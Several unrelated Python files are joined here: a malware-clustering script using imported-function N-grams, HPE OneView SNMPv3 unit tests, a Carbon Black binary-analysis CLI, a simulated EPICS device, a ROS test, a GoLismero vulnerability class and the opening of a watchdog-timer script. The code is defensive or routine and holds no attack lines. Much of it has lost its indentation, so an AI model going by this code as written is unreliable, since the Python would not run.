# Iterate over function imports for each malware sample, creating N-grams along the way
for md5, num_imports in tqdm(info_list, desc='MakeN-Grams'):
md5_to_ngrams[md5] = list()
for index in range(import_index, import_index + int(num_imports) - n + 1):
ngram = tuple([record[1].lower() + "," + record[2].lower() for record in record_list[index:index + n]])
md5_to_ngrams[md5].append(ngram)
import_index += int(num_imports)
return md5_to_ngrams
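# Minimal usage sketch on toy data (the md5, library and function names are
# hypothetical, not taken from EMBER):
def _example_ngram_conversion():
    """Build 2-grams for a single sample with three function imports."""
    info = [("md5_a", "3")]
    records = [
        ("md5_a", "kernel32.dll", "CreateFileA"),
        ("md5_a", "kernel32.dll", "ReadFile"),
        ("md5_a", "kernel32.dll", "CloseHandle"),
    ]
    return convert_function_imports_to_ngrams(info, records, n=2)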
def create_feature_vectors_from_ngrams(sample_to_ngrams: dict) -> tuple:
"""Create feature vectors for each malware sample, where an integer
in the vector represents the presence of a corresponding N-gram in
that sample.
Parameters
----------
sample_to_ngrams : dict
A dict mapping str to lists: MD5 to list of N-grams
Returns
-------
(dict, dict)
a mapping of str to list: MD5 to feature vector (list of ints)
a mapping of int to str: numerical encoding to N-gram
"""
# Create a set of each observed N-gram
ngrams = {ngram for ngram_list in sample_to_ngrams.values() for ngram in ngram_list}
# Create a unique numerical encoding for each observed N-gram
ngram_encodings = {encoding: ngram for encoding, ngram in zip(range(len(ngrams)), ngrams)}
# Create a reverse dictionary from N-grams to encodings
encodings_reverse_dict = {v: k for k, v in ngram_encodings.items()}
# Create feature vectors to represent each sample
md5_vector_mapping = OrderedDict()
for md5, ngram_list in tqdm(sample_to_ngrams.items(), desc='CreateFVs'):
md5_vector_mapping[md5] = [0] * len(ngram_encodings)
for ngram in ngram_list:
md5_vector_mapping[md5][encodings_reverse_dict[ngram]] += 1
return md5_vector_mapping, ngram_encodings
def reduce_dimensions_hashing_trick(md5_vector_mapping: dict) -> csr_matrix:
"""Reduce dimensions to a vector of a fixed-length by
applying the hashing trick.
The scikit-learn feature hasher was employed here:
https://scikit-learn.org/stable/modules/generated/sklearn.feature_extraction.FeatureHasher.html
Parameters
----------
md5_vector_mapping : dict
A mapping of str to list: MD5 to feature vector (list of ints)
Returns
-------
sparse matrix of shape (n_samples, n_features)
Feature matrix from hashed n-grams.
"""
# Create a feature hasher
h = FeatureHasher(2 ** 12, input_type="string", alternate_sign=False)
fv_matrix = list()
# For each sample, identify the indices relating to the n-grams that sample contains
# Store the information in a feature value matrix
for fv in tqdm(md5_vector_mapping.values(), desc='BuildStrFVs'):
indices = [str(i) for i in range(len(fv)) if fv[i] > 0]
fv_matrix.append(indices)
# Hash the results to a smaller matrix using the feature hasher
hashed_matrix = h.transform(fv_matrix)
return hashed_matrix
def select_prototypes(feature_matrix: csr_matrix, p_max: float) -> tuple:
"""Select prototypes from the matrix of hashed feature vectors.
Parameters
----------
feature_matrix : sparse matrix of shape (n_samples, n_features)
Feature matrix from hashed n-grams
p_max : float
"Threshold for distances from data points to their nearest prototypes"
Returns
-------
(list, dict)
List of selected prototypes. Perhaps we want to keep using a subset of the sparse matrix though?
Mapping of prototypes to datapoints
"""
prototypes = list()
prototypes_to_data_points = dict()
# Randomly select first prototype
prototypes.append(random.randint(0, feature_matrix.get_shape()[0] - 1))
data_points = [data_point for data_point in range(feature_matrix.get_shape()[0]) if data_point != prototypes[0]]
prototypes_to_data_points[prototypes[0]] = data_points
# Find next prototype using the largest distance
prototype_distances = normalize(pairwise_distances(feature_matrix.getrow(prototypes[0]), feature_matrix),
norm="max")
next_potential_prototype = np.argmax(prototype_distances)
max_dist = np.max(prototype_distances)
# Find new prototypes until all data points are within radius Pmax of a prototype
while max_dist > p_max and len(prototypes) < feature_matrix.get_shape()[0]:
new_prototype = next_potential_prototype
new_prototype_distances = normalize(pairwise_distances(feature_matrix.getrow(new_prototype), feature_matrix),
norm="max")
prototype_distances = vstack((prototype_distances, new_prototype_distances))
new_prototype_data_points = list()
data_points_to_remove = list()
max_dist = 0
# For each datapoint, determine whether it needs to be shifted to the new prototype, while also
# keeping track of that max distance between data points and their closest prototypes to determine
# the next potential prototype
for prototype_index in range(len(prototypes)):
prototype = prototypes[prototype_index]
for data_point in prototypes_to_data_points[prototype]:
distance_to_current_prototype = prototype_distances[prototype_index][data_point]
distance_to_new_prototype = prototype_distances[-1][data_point]
# If data point is closer to new prototype, move it to new cluster
if distance_to_current_prototype > distance_to_new_prototype:
if new_prototype != data_point:
new_prototype_data_points.append(data_point)
data_points_to_remove.append(data_point)
distance_to_current_prototype = distance_to_new_prototype
# If a new max distance to a datapoint's closest prototype is found
# update the max distance and the next potential prototype
if distance_to_current_prototype > max_dist:
max_dist = distance_to_current_prototype
next_potential_prototype = data_point
# Remove data points from current cluster that are being moved to new cluster
prototypes_to_data_points[prototype] = [data_point for data_point in prototypes_to_data_points[prototype]
if data_point not in data_points_to_remove]
data_points_to_remove.clear()
# Create new prototype with corresponding cluster
prototypes.append(new_prototype)
prototypes_to_data_points[new_prototype] = new_prototype_data_points
return prototypes, prototypes_to_data_points
def cluster_prototypes(feature_matrix: csr_matrix, prototypes: list, min_d: float) -> list:
"""
Clusters prototypes together such that no two prototypes are within a certain threshold of one another
Parameters
----------
feature_matrix: sparse matrix of shape (n_samples, n_features)
Feature matrix from hashed n-grams
prototypes: list
List of prototype row indices in the feature matrix
min_d: float
Distance threshold for minimum distance between prototypes of a cluster
Returns
-------
list:
list of lists representing clusters
"""
# Sort prototypes for simpler computations
prototypes.sort()
# Initialize clusters as singleton clusters for each prototype
clusters = [[prototype] for prototype in prototypes]
# Compute distances between each of the prototypes
feature_matrix = feature_matrix[prototypes]
prototype_to_prototype_distances = normalize(pairwise_distances(feature_matrix, feature_matrix), norm="max")
# Assign all zero distances (prototypes' distances to themselves) from the distance matrix to 2
# where 2 is an arbitrary number > MinD
prototype_to_prototype_distances[prototype_to_prototype_distances == 0] = 2
# Compute minimum distance between two prototypes
min_dist = prototype_to_prototype_distances.min()
# Combine clusters until the minimum distance between closest clusters is >= MinD
while min_dist < min_d:
indices = np.where(prototype_to_prototype_distances == min_dist)
prototype1 = indices[0][0]
prototype2 = indices[1][0]
cluster_found = False
new_cluster = list()
# Combine prototype1 and prototype2 clusters together
for cluster in clusters:
if prototypes[prototype1] in cluster or prototypes[prototype2] in cluster:
if not cluster_found:
new_cluster = cluster
cluster_found = True
else:
for prototype in cluster:
new_cluster.append(prototype)
clusters.remove(cluster)
# Assign distance between prototype1 and prototype2 to 2 where 2 is an arbitrary number > MinD
prototype_to_prototype_distances[prototype1][prototype2] = 2
prototype_to_prototype_distances[prototype2][prototype1] = 2
# Compute the new minimum distance between clusters
min_dist = prototype_to_prototype_distances.min()
return clusters
def indices_to_md5s(prototype_clusters: list, prototypes_to_data_points: dict, md5s: list) -> tuple:
"""
Groups clusters together using their original md5s
Parameters
----------
prototype_clusters: list
List of lists representing clustered prototypes
prototypes_to_data_points: dict
Dict mapping from each prototype to the data points within their cluster
md5s: list
List of all md5s
Returns
-------
(List, List)
A list of lists where each inner list contains md5s representing a cluster
A list of lists where each inner lists contains md5s representing prototypes within a cluster
"""
md5_clusters = list()
current_cluster = list()
md5_prototype_clusters = list()
current_prototype_cluster = list()
# Convert clusters from indices to md5s
for cluster in prototype_clusters:
for prototype in cluster:
current_cluster.append(md5s[prototype])
current_prototype_cluster.append(md5s[prototype])
for data_point in prototypes_to_data_points[prototype]:
current_cluster.append(md5s[data_point])
md5_clusters.append(current_cluster.copy())
current_cluster.clear()
md5_prototype_clusters.append(current_prototype_cluster.copy())
current_prototype_cluster.clear()
return md5_clusters, md5_prototype_clusters
def score_clustering(md5_clusters: list, prototype_clusters: list, md5_to_avclass: dict):
"""
Scores clustering by various metrics (precision, recall, F-scores, homogeneity, completeness, V-Measure)
Parameters
----------
md5_clusters: list
List of lists of md5s, where each inner list represents a cluster
prototype_clusters: list
List of lists of md5s, where each inner list represents a cluster of prototypes
md5_to_avclass: dict
Mapping from md5s to AVClass labels attributed to each malware sample
Returns
-------
Tuple containing all scoring metrics
"""
y_true = list()
y_pred = list()
labels_accuracy = list()
# Assign cluster label for each cluster as most common AVClass labelling among prototypes in a cluster
for cluster_index in range(len(prototype_clusters)):
# Extract each AVClass label from this cluster
classes = [md5_to_avclass[md5] for md5 in prototype_clusters[cluster_index]]
# Assign the most common AVClass label as the cluster label
class_count = Counter(classes)
cluster_label = class_count.most_common(1)[0][0]
correct_classifications = 0
# Assign predicted and true AVClass labels to each sample
for md5 in md5_clusters[cluster_index]:
y_true.append(md5_to_avclass[md5])
y_pred.append(cluster_label)
if md5_to_avclass[md5] == cluster_label:
correct_classifications += 1
# Calculate how many samples in the cluster were accurately labeled
accuracy = round(correct_classifications / len(md5_clusters[cluster_index]), 4) * 100
labels_accuracy.append((cluster_label, accuracy))
# Score clustering
precision, recall, fscore_macro, _ = precision_recall_fscore_support(y_true=y_true, y_pred=y_pred, average='macro')
fscore_micro = f1_score(y_true=y_true, y_pred=y_pred, average='micro')
fscore_weighted = f1_score(y_true=y_true, y_pred=y_pred, average='weighted')
homogeneity, completeness, v_measure = homogeneity_completeness_v_measure(labels_true=y_true, labels_pred=y_pred)
return [precision, recall, fscore_macro, fscore_micro, fscore_weighted, homogeneity, completeness, v_measure], \
labels_accuracy
def cluster_signatures(int_to_ngram: dict, md5_clusters: list, md5_to_fvs: dict):
"""
Creates cluster signatures based on shared N-grams between elements in a cluster
Parameters
----------
int_to_ngram: dict
Integer encoding for each N-gram corresponding to index in feature vector
md5_clusters: list
List of lists of md5s, where each inner list represents a cluster
md5_to_fvs: dict
Mapping from md5s to feature vectors
Returns
-------
List
List of signatures (N-grams) corresponding to each cluster
"""
signatures = list()
features = list()
# Create signatures representing each cluster
for cluster in tqdm(md5_clusters, desc="CreatingSignatures"):
# Retrieve all the N-grams from this cluster (in the form of indices)
for md5 in cluster:
features.extend([index for index in range(len(md5_to_fvs[md5])) if md5_to_fvs[md5][index] > 0])
counter = Counter(features)
        # Set the signature as the 7 most common N-grams in the cluster
        # (or all N-grams if there are fewer than 7)
        if len(counter) >= 7:
            common_ngrams = counter.most_common(7)
            signature = [int_to_ngram[ngram[0]] for ngram in common_ngrams]
        else:
            # Iterating a Counter yields its keys (the N-gram encodings) directly
            signature = [int_to_ngram[ngram] for ngram in counter]
signatures.append(signature)
features.clear()
return signatures
def log_results(results: list, n: int, p_max: float, d_min: float, md5_clusters: list, md5_prototype_clusters: list,
md5_to_avclass: dict, signatures: list, labels_accuracy: list):
"""
Log results into a CSV file
Parameters
----------
results: list
List containing results to be logged
n: int
N-gram size
p_max: float
Distance threshold for prototype selection
d_min: float
Distance threshold for prototype clustering
md5_to_avclass: dict
Mapping from md5 to respective AVClass label
md5_clusters: list
List of lists of md5s, where each inner list represents a cluster
md5_prototype_clusters: list
List of lists of md5s, where each inner list represents a cluster of prototypes
signatures: list
List of signatures corresponding to each cluster
labels_accuracy: list
List of labels predicted for each cluster, along with % accuracy of that labeling
"""
date_time = datetime.now().strftime('%b-%d-%Y-%H-%M')
csv_file_name = "mutantxs_results_{}_{}_{}_{}.csv".format(n, p_max, d_min, date_time)
json_file_name = "mutantxs_results_{}_{}_{}_{}.json".format(n, p_max, d_min, date_time)
fields = ['precision', 'recall', 'fscore_macro', 'fscore_micro', 'fscore_weighted',
'homogeneity', 'completeness', 'v_measure']
# Log numerical results to a CSV file
with open(csv_file_name, 'w') as res_file:
csv_writer = csv.writer(res_file)
csv_writer.writerow(fields)
csv_writer.writerow(results)
clusters_info = list()
cluster_count = 0
# Log clustering results to JSON file
for cluster_index in range(len(md5_clusters)):
cluster = md5_clusters[cluster_index]
cluster_info = {
"cluster_number": cluster_count,
"sample_count": len(cluster),
"assigned_avclass": [
labels_accuracy[cluster_index][0],
labels_accuracy[cluster_index][1]
],
"md5s": [[md5, md5_to_avclass[md5]] for md5 in cluster],
"prototypes": [[md5, md5_to_avclass[md5]] for md5 in md5_prototype_clusters[cluster_index]],
"signature": [ngram for ngram in signatures[cluster_index]]
}
cluster_count += 1
clusters_info.append(cluster_info)
dict_results = {
"feature_set": "Ember",
"num_signatures": len(md5_clusters),
"compilation date": date_time,
"clusters": clusters_info
}
with open(json_file_name, 'w') as json_file:
dump(dict_results, json_file, indent=2)
if __name__ == '__main__':
lg.basicConfig(
format='[%(asctime)s %(filename)s:%(lineno)s - %(funcName)s()] %(message)s',
datefmt='%Y/%m/%d %H:%M:%S',
level=lg.INFO
)
main()
|
# -*- coding: utf-8 -*-
###
# (C) Copyright [2020] Hewlett Packard Enterprise Development LP
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###
import unittest
import mock
from hpeOneView.connection import connection
from hpeOneView.resources.settings.appliance_device_snmp_v3_users import ApplianceDeviceSNMPv3Users
from hpeOneView.resources.resource import ResourceClient
class ApplianceDeviceSNMPv3UsersTest(unittest.TestCase):
def setUp(self):
self.host = '127.0.0.1'
self.connection = connection(self.host, 800)
self._snmp_v3_users = ApplianceDeviceSNMPv3Users(self.connection)
@mock.patch.object(ResourceClient, 'get_all')
def test_get_all_called_once(self, mock_get):
self._snmp_v3_users.get_all()
mock_get.assert_called_once_with(0, -1, filter='', sort='')
@mock.patch.object(ResourceClient, 'create')
def test_create_called_once(self, mock_create):
resource = {
'type': 'Users',
'userName': 'testUser1',
'securityLevel': 'Authentication and privacy',
'authenticationProtocol': 'SHA512',
'authenticationPassphrase': 'authPass',
'privacyProtocol': 'AES-256',
'privacyPassphrase': '1234567812345678'
}
self._snmp_v3_users.create(resource)
mock_create.assert_called_once_with(resource, timeout=-1)
@mock.patch.object(ResourceClient, 'get')
def test_get_called_once(self, mock_get):
self._snmp_v3_users.get('0ca1b9e9-3c30-405f-b450-abd36730aa38')
mock_get.assert_called_once_with('0ca1b9e9-3c30-405f-b450-abd36730aa38')
@mock.patch.object(ResourceClient, 'get')
def test_get_with_uri_called_once(self, mock_get):
uri = '/rest/appliance/snmpv3-trap-forwarding/users/0ca1b9e9-3c30-405f-b450-abd36730aa38'
self._snmp_v3_users.get(uri)
mock_get.assert_called_once_with(uri)
@mock.patch.object(ResourceClient, 'get_by')
def test_get_by_uri_called_once(self, mock_create):
uri = '/rest/appliance/snmpv3-trap-forwarding/users/0ca1b9e9-3c30-405f-b450-abd36730aa38'
self._snmp_v3_users.get_by('uri', uri)
mock_create.assert_called_once_with('uri', uri)
@mock.patch.object(ResourceClient, 'update')
def test_update_called_once(self, mock_create):
resource = {
'authenticationPassphrase': 'newAuthPass',
'privacyPassphrase': 8765432187654321,
'uri': '/rest/appliance/snmpv3-trap-forwarding/users/0ca1b9e9-3c30-405f-b450-abd36730aa38'
}
self._snmp_v3_users.update(resource)
mock_create.assert_called_once_with(resource, timeout=-1)
@mock.patch.object(ResourceClient, 'delete')
def test_delete_called_once(self, mock_create):
id_or_uri = '/rest/appliance/snmpv3-trap-forwarding/users/0ca1b9e9-3c30-405f-b450-abd36730aa38'
self._snmp_v3_users.delete(id_or_uri)
mock_create.assert_called_once_with(id_or_uri, timeout=-1)
|
# -*- coding: utf-8 -*-
# *******************************************************
# Copyright (c) VMware, Inc. 2020-2021. All Rights Reserved.
# SPDX-License-Identifier: MIT
# *******************************************************
# *
# * DISCLAIMER. THIS PROGRAM IS PROVIDED TO YOU "AS IS" WITHOUT
# * WARRANTIES OR CONDITIONS OF ANY KIND, WHETHER ORAL OR WRITTEN,
# * EXPRESS OR IMPLIED. THE AUTHOR SPECIFICALLY DISCLAIMS ANY IMPLIED
# * WARRANTIES OR CONDITIONS OF MERCHANTABILITY, SATISFACTORY QUALITY,
# * NON-INFRINGEMENT AND FITNESS FOR A PARTICULAR PURPOSE.
"""
Binary analysis tool for managing and submitting hashes
This class performs binary analysis on a series of hashes passed in on the command line.
"""
import os
import sys
import argparse
import logging
import traceback
from datetime import datetime
from cbc_binary_toolkit import cli_input
from cbc_binary_toolkit import EngineResults
from cbc_binary_toolkit.config import Config
from cbc_binary_toolkit.deduplication_component import DeduplicationComponent
from cbc_binary_toolkit.ingestion_component import IngestionComponent
from cbc_binary_toolkit.engine import LocalEngineManager
from cbc_binary_toolkit.state import StateManager
from cbc_sdk import CBCloudAPI
DEFAULT_LOG_LEVEL = "INFO"
LOG_LEVELS = {
'CRITICAL': logging.CRITICAL,
'ERROR': logging.ERROR,
'WARNING': logging.WARNING,
'INFO': logging.INFO,
'DEBUG': logging.DEBUG
}
log = logging.getLogger(__name__)
class AnalysisUtility:
"""The top level analysis utility class. This is intended as an example which can be modified as needed."""
def __init__(self, default_install):
"""Constructor for the analysis utility class"""
self.default_install = default_install
self.config = None
self.cbc_api = None
# Create argument parser
self._parser = argparse.ArgumentParser()
self._parser.add_argument("-c", "--config", type=str, default=default_install,
help="Location of the configuration file (default {0})".format(default_install))
self._parser.add_argument("-ll", "--log-level", type=str, default="INFO",
choices=["DEBUG", "INFO", "WARNING", "ERROR", "CRITICAL"],
help="The base log level (default {0})".format(DEFAULT_LOG_LEVEL))
commands = self._parser.add_subparsers(help="Binary analysis commands", dest="command_name")
# Analyze command parser
analyze_command = commands.add_parser("analyze", help="Analyze a list of hashes by command line or file")
input_type = analyze_command.add_mutually_exclusive_group(required=True)
input_type.add_argument("-l", "--list", type=str, help="List of hashes in JSON string format")
input_type.add_argument("-f", "--file", type=argparse.FileType('r'),
help="File of hashes in json or csv format")
# Restart command parser
commands.add_parser("restart", help="Restart a failed job and pick up where the job crashed or exited")
# Clear command parser
clear_command = commands.add_parser("clear", help="Clear cache of analyzed hashes. All or by timestamp")
clear_command.add_argument("-t", "--timestamp", type=str,
help="ISO 8601 date format {YYYY-MM-DD HH:MM:SS.SSS}")
clear_command.add_argument("--force", action='store_true', help="Force clearing without prompting")
clear_command.add_argument("-r", "--reports", action='store_true', help="Also clear any unsent reports present")
def _init_components(self):
"""
Initialize the components of the toolkit, injecting their dependencies as they're created.
Returns:
dict: A dict containing all the references to the top-level components.
"""
try:
state_manager = StateManager(self.config)
        except Exception:
log.error("Failed to create State Manager. Check your configuration")
log.debug(traceback.format_exc())
state_manager = None
cbc_api = self.cbc_api
if cbc_api is None:
cbc_api = CBCloudAPI(url=self.config.get("carbonblackcloud.url"),
org_key=self.config.get("carbonblackcloud.org_key"),
token=self.config.get("carbonblackcloud.api_token"),
ssl_verify=self.config.get("carbonblackcloud.ssl_verify"))
deduplicate = DeduplicationComponent(self.config, state_manager)
ingest = IngestionComponent(self.config, cbc_api, state_manager)
results_engine = EngineResults(self.config.get("engine.name"), state_manager, cbc_api)
if self.config.get("engine.type") == "local":
try:
engine_manager = LocalEngineManager(self.config)
            except Exception:
log.error("Failed to create Local Engine Manager. Check your configuration")
log.debug(traceback.format_exc())
engine_manager = None
else:
engine_manager = None
return {
"deduplicate": deduplicate,
"ingest": ingest,
"engine_manager": engine_manager,
"results_engine": results_engine,
"state_manager": state_manager,
"success": True if state_manager is not None and engine_manager is not None else False
}
def _yes_or_no(self, question):
"""
Request confirmation of something from the user.
Args:
question (str): Question to ask the user.
Returns:
boolean: True if the user answered Yes, False if they answered No.
"""
        reply = str(input(f"{question}: (y/n)")).lower().strip()
        if reply.startswith('y'):
            return True
        if reply.startswith('n'):
            return False
        log.error("Invalid: please use y/n")
        return self._yes_or_no(question)
def _any_reports_present(self, state_manager):
"""
Returns True if there are any report items present in the database.
Args:
state_manager (StateManager): The state manager object created by the clear process.
Returns:
(boolean) True if there are any report items present in the database, False if not.
"""
for i in range(1, 11):
items = state_manager.get_current_report_items(i, self.config.get("engine.name"))
if len(items) > 0:
return True
return False
def _process_metadata(self, components, metadata_list):
"""
Analyze a list of metadata through the analysis engine and report on the results.
The back end to the analyze and restart commands.
Args:
components (dict): Dict containing all the component references as returned from _init_components.
metadata_list (list): List of metadata objects to be analyzed.
"""
for metadata in metadata_list:
response = components["engine_manager"].analyze(metadata)
components["results_engine"].receive_response(response)
log.info('Analysis Completed')
if self.config.get("engine.feed_id"):
components["results_engine"].send_reports(self.config.get("engine.feed_id"))
else:
log.info("Feed publishing disabled. Specify a feed_id to enable")
def _analyze_command(self, args, components):
"""
Implements the "analyze" command to analyze a list of hashes.
Args:
args (Namespace): The command-line arguments as parsed.
components (dict): Dict containing all the component references as returned from _init_components.
"""
if args.file is not None:
hash_group = cli_input.read_csv(args.file)
else:
hash_group = cli_input.read_json(args.list)
before = len(hash_group)
log.info("Checking for previously executed binaries")
hash_group = components["deduplicate"].deduplicate(hash_group)
if before > len(hash_group):
log.info(f"Found {before - len(hash_group)} binaries that have already been analyzed")
metadata_list = components["ingest"].fetch_metadata(hash_group)
self._process_metadata(components, metadata_list)
def _restart_command(self, components):
"""
Implements the "restart" command to resume analysis on already-ingested hash values.
Args:
components (dict): Dict containing all the component references as returned from _init_components.
"""
components["results_engine"].reload()
metadata_list = components["ingest"].reload()
self._process_metadata(components, metadata_list)
def main(self, cmdline_args):
"""
Entry point for the analysis utility.
Args:
cmdline_args (list): Command-line argument strings to be parsed.
Returns:
int: Return code from the utility (0=success, nonzero=failure).
"""
args = self._parser.parse_args(cmdline_args)
logging.basicConfig(level=LOG_LEVELS[args.log_level])
if args.log_level != "DEBUG":
sys.tracebacklimit = 0
log.debug("Started: {}".format(datetime.now()))
if args.command_name is None:
print(
"usage: cbc-binary-analysis [-h] [-c CONFIG]\n"
" [-ll {DEBUG,INFO,WARNING,ERROR,CRITICAL}]\n"
" {analyze,restart,clear} ...\n"
"cbc-binary-analysis: error: the following arguments are required: command_name")
return
try:
if self.config is None:
if args.config != self.default_install:
self.config = Config.load_file(args.config)
elif self.default_install == "ERROR":
# Exit if default_install was not found
log.error("Exiting as default example config file could not be "
"found and no alternative was specified")
return 1
else:
log.info(f"Attempting to load config from {self.default_install}")
self.config = Config.load_file(self.default_install)
if args.command_name == "analyze":
components = self._init_components()
if components["success"]:
log.info("Analyzing hashes")
self._analyze_command(args, components)
elif args.command_name == "clear":
timestamp = args.timestamp
if timestamp is None:
timestamp = str(datetime.now())
if not (args.force or self._yes_or_no(f"Confirm you want to clear runs prior to {timestamp}")):
log.info("Clear canceled")
return
# Clear previous states
try:
state_manager = StateManager(self.config)
except Exception:
log.error("Failed to create State Manager. Check your configuration")
log.debug(traceback.format_exc())
else:
log.info("Clearing cache")
state_manager.prune(timestamp)
if args.reports and self._any_reports_present(state_manager):
if args.force or self._yes_or_no("Confirm you want to clear unsent report items"):
log.info("Clearing report items")
for i in range(1, 11):
state_manager.clear_report_items(i, self.config.get("engine.name"))
elif args.command_name == "restart":
components = self._init_components()
if components["success"]:
log.info("Restarting")
self._restart_command(components)
log.debug("Finished: {}".format(datetime.now()))
return 0
except Exception:
log.error(traceback.format_exc())
return 1
def main():
"""Universal Entry Point"""
if "cbc-binary-toolkit" in os.path.dirname(os.path.realpath(__file__)):
default_install = os.path.join(os.path.dirname(os.path.realpath(__file__)),
"../../../config/binary-analysis-config.yaml.example")
else:
starting_dir = (os.path.dirname(os.path.realpath(__file__)), "")
config_example_dir = "carbonblackcloud/binary-toolkit/binary-analysis-config.yaml.example"
# Try and navigate up and find example config file
while starting_dir[0] != "" and starting_dir[0] != "/":
if os.path.exists(os.path.join(starting_dir[0], config_example_dir)):
break
starting_dir = os.path.split(starting_dir[0])
if starting_dir[0] == "" or starting_dir[0] == "/":
default_install = "ERROR"
else:
default_install = os.path.join(starting_dir[0], config_example_dir)
return AnalysisUtility(default_install).main(sys.argv[1:])
if __name__ == '__main__':
sys.exit(main())
|
from lewis.devices import Device
from lewis.adapters.epics import EpicsInterface, PV
from lewis.adapters.stream import StreamInterface, Var
from lewis.core.utils import check_limits
class VerySimpleDevice(Device):
upper_limit = 100
lower_limit = 0
simple = 42
ropi = 3.141
param = 10
_second = 2.0
def get_param(self):
"""The parameter multiplied by 2."""
return self.param * 2
def set_param(self, new_param):
self.param = int(new_param / 2)
@property
def second(self):
"""A second (floating point) parameter."""
return self._second
@second.setter
@check_limits('lower_limit', 'upper_limit')
def second(self, new_second):
self._second = new_second
class VerySimpleInterface(EpicsInterface):
"""
This is the EPICS interface to a quite simple device. It offers six PVs that expose
different things that are part of the device, the interface or neither.
"""
pvs = {
'Simple': PV('simple', type='int', doc='Just an attribute exposed as on a PV'),
'PI': PV('ropi', type='float', read_only=True, doc='Example of a read-only attribute'),
'Param': PV(('get_param', 'set_param'), type='int', doc='Exposed via getter/setter'),
'Second': PV('second', meta_data_property='param_raw_meta', doc='Meta-property to add limits'),
'Second-Int': PV('second_int', type='int', doc='Conversion to int via helper function'),
'Constant': PV(lambda: 4, doc='A constant number, returned from lambda function.')
}
@property
def param_raw_meta(self):
return {'lolo': self.device.lower_limit, 'hihi': self.device.upper_limit}
@property
def second_int(self):
"""The second parameter as an integer."""
return int(self.device.second)
class VerySimpleStreamInterface(StreamInterface):
"""This is a TCP stream interface to the epics device, which only exposes param."""
commands = {
Var('param', read_pattern=r'P\?$', write_pattern=r'P=(\d+)', argument_mappings=(int,),
doc='An integer parameter.')
}
in_terminator = '\r\n'
out_terminator = '\r\n'
# Really don't like this
framework_version = '1.2.1'
|
#!/usr/bin/env python
# Software License Agreement (BSD License)
#
# Copyright (c) 2021, OMRON SINIC X
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of OMRON SINIC X nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# Author: Felix von Drigalski
import sys
import rospy
import unittest
from o2ac_routines.helpers import *
from o2ac_routines.assembly import O2ACAssembly
class TestAssembly(unittest.TestCase):
def setUp(self):
"""
Sets up the test. Afterwards, all functions starting with test_ are executed.
"""
self.base = O2ACAssembly()
def test_full_assembly_task(self):
# Prepare scene
self.base.reset_scene_and_robots()
self.base.spawn_objects_for_demo(base_plate_in_tray=True, layout_number=2)
# Execute
success = self.base.full_assembly_task()
print("Full assembly test finished")
self.assertTrue(success)
if __name__ == '__main__':
import rostest
rospy.init_node('test_robot_motions')
rostest.rosrun('o2ac_routines', 'test_robot_motions', TestAssembly)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__license__= """
GoLismero 2.0 - The web knife - Copyright (C) 2011-2014
Golismero project site: https://github.com/golismero
Golismero project mail: contact@golismero-project.com
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""
__all__ = ["SuspiciousHTML"]
from .. import Vulnerability
from ... import identity
from ...information.html import HTML
#------------------------------------------------------------------------------
class SuspiciousHTML(Vulnerability):
"""
Suspicious HTML Content.
HTML content was found that may contain sensitive information.
User attention could be required.
"""
TARGET_CLASS = HTML
DEFAULTS = Vulnerability.DEFAULTS.copy()
DEFAULTS["level"] = "informational"
DEFAULTS["cvss_base"] = "2.9"
DEFAULTS["references"] = (
"https://www.owasp.org/index.php/Information_Leakage",
)
#--------------------------------------------------------------------------
def __init__(self, target, substring, **kwargs):
"""
:param target: HTML content where the suspicious substring was found.
:type target: HTML
:param substring: Substring that causes suspicion.
:type substring: str
"""
# Validate the data types.
if type(substring) is not str:
raise TypeError("Expected str, got %r instead" % type(substring))
# Save the properties.
self.__substring = substring
# Parent constructor.
super(SuspiciousHTML, self).__init__(target, **kwargs)
__init__.__doc__ += Vulnerability.__init__.__doc__[
Vulnerability.__init__.__doc__.find("\n :keyword"):]
#--------------------------------------------------------------------------
@identity
def substring(self):
"""
:returns: Substring that causes suspicion.
:rtype: str
"""
return self.__substring
|
#!/usr/bin/python3
# WDT: Watchdog Timer
# A python 3 interface to use the linux watchdog timer
#
# (c) Marco Tedaldi <tedaldi@hifo.uzh.ch> 2014
# License: MIT, http://opensource.org/licenses/MIT
import time # for the delay inside main
import sys # needed for exit
import os # needed for file handling
# Watchdog timer class
# First, check if the watchdog file exists and is writeable
class wdt:
